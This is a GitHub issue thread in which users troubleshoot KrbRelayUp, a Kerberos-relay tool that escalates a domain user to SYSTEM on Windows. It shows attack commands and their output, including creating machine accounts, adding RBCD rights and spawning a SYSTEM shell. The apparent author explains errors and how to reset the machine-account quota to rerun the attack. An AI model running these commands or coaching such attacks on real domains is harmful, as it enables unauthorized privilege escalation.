0xBrAinsTorM
commented
2 years ago Are you sure you used the FQDN for -Domain? I get this error if the Domain is not correct (i.e. using windomain when it should be windomain.local)
Open dreizehnutters opened 2 years ago
0xBrAinsTorM
commented
2 years ago Are you sure you used the FQDN for -Domain? I get this error if the Domain is not correct (i.e. using windomain when it should be windomain.local)
PyroChiliarch
commented
2 years ago I had this issue, started working after a reboot.
qiminghe
commented
2 years ago same issue here. Let's say I have a host=laptop123 on AD domain=mycompany.com, tried following neither works: KrbRelayUp.exe relay -d laptop123.local -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123 [+] Computer account "evilhost$" added with password "pass0123" [-] Could not find computer account SID: [-] Index was out of range. Must be non-negative and less than the size of the collection. Parameter name: index KrbRelayUp.exe relay -d mycompany.com -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123 [-] Could not add new computer account: [-] The user has insufficient access rights. Help?
Dec0ne
commented
2 years ago same issue here. Let's say I have a host=laptop123 on AD domain=mycompany.com, tried following neither works: KrbRelayUp.exe relay -d laptop123.local -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123 [+] Computer account "evilhost$" added with password "pass0123" [-] Could not find computer account SID: [-] Index was out of range. Must be non-negative and less than the size of the collection. Parameter name: index KrbRelayUp.exe relay -d mycompany.com -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123 [-] Could not add new computer account: [-] The user has insufficient access rights. Help?
In the first command your domain was incorrect so it couldn't find the SID of the new computer in that domain (cause it doesn't exist) so this why it failed. In the second command the domain flag was correct but it couldn't add the "evilhost$" computer because it's already exist (it was added in the first command). Try either remove the -CreateNewComputerAccount from the second command or specify a new -computerName:
In the next version (should be out this week) the tool will lookup the domain by itself so this kind of confusion would be less likely to happen again.
qiminghe
commented
2 years ago Tried two revisions, getting the same error: [-] Could not add new computer account: [-] The user has insufficient access rights. Do I have to be Win local admin (run as admin) for the command? Tried that, does not help either Any debug/log option I can turn on for troubleshooting? Regarding domain lookup, is it just: PS>systeminfo | Select-String 'Domain' which I used here.
qiminghe
commented
2 years ago I pulled out the latest and re-run the excutable and notice following option dispearing -c (--CreateNewComputerAccount) Assuming I am running the executable from existing laptop123 I own: .\KrbRelayUp.exe relay -d mycompany.com -cn laptop123$ -cp pass0123 [+] Rewriting function table [+] Rewriting PEB [+] Init COM server [+] Register COM server [+] Forcing SYSTEM authentication [+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now... [+] LDAP session established [+] RBCD rights added successfully [+] Run the spawn method for SYSTEM shell: ./KrbRelayUp spawn -d mycompany.com -cn laptop123$ -cp pass0123 However, when running the last suggested command, I am getting following error: KrbRelayUp - Relaying you to SYSTEM [-] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED: Do I have to do anything about laptop's firewall? I can verify AD server port 389/88 are all open. Anything else I need to check?
Dec0ne
commented
2 years ago [-] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED means that the password specified for the laptop123$ machine account is incorrect.
the -cn and -cp flags are for the separate machine account you own or the one you added if you specified -c to create a new one (not the one you are executing KrbRelayUp from)
run those 2 commands and it should work:
qiminghe
commented
2 years ago when running the following command to createnewcomputeraccount (-c) \KrbRelayUp.exe relay -d mycompany.com -c -cn newcomputer$ -cp newpass0123 I fall back to old error below (still not sure what causing problem without debug/logs) KrbRelayUp - Relaying you to SYSTEM [-] Could not add new computer account: [-] The user has insufficient access rights.
Dec0ne
commented
2 years ago Insufficient privileges to add a computer account usually is due to either a restriction in the domain where regular users are not allowed to add a new machine accout (this is actually one of the mitigation suggestions for this attack) or because your user have reached the maximum quota for new computer accounts it may add which is 10 by default (this is my guess for your specific issue). You can either delete via domain admin from the DC all of the computer accounts you've added and that will reset your user's quata so you can perform the attack again or use another domain user to perform the attack with.
qiminghe
commented
2 years ago I verified:
Dec0ne
commented
2 years ago Could you check the previous commands using new low priv user? (which probably still hadn't reached it's ms-DS-MachineAccountQuota limit) Other route you could take is login in to your DC using a domain admin and manually deleting all of the machine accounts added by the previous KrbRelayUp runs, this will let your user add new machine accounts again.
Hey,
I just tried the POC for a costumer. Unfortunately the method does not seem to work on the Windows 10 Enterprise 19042 Client. LDAP signing is disabled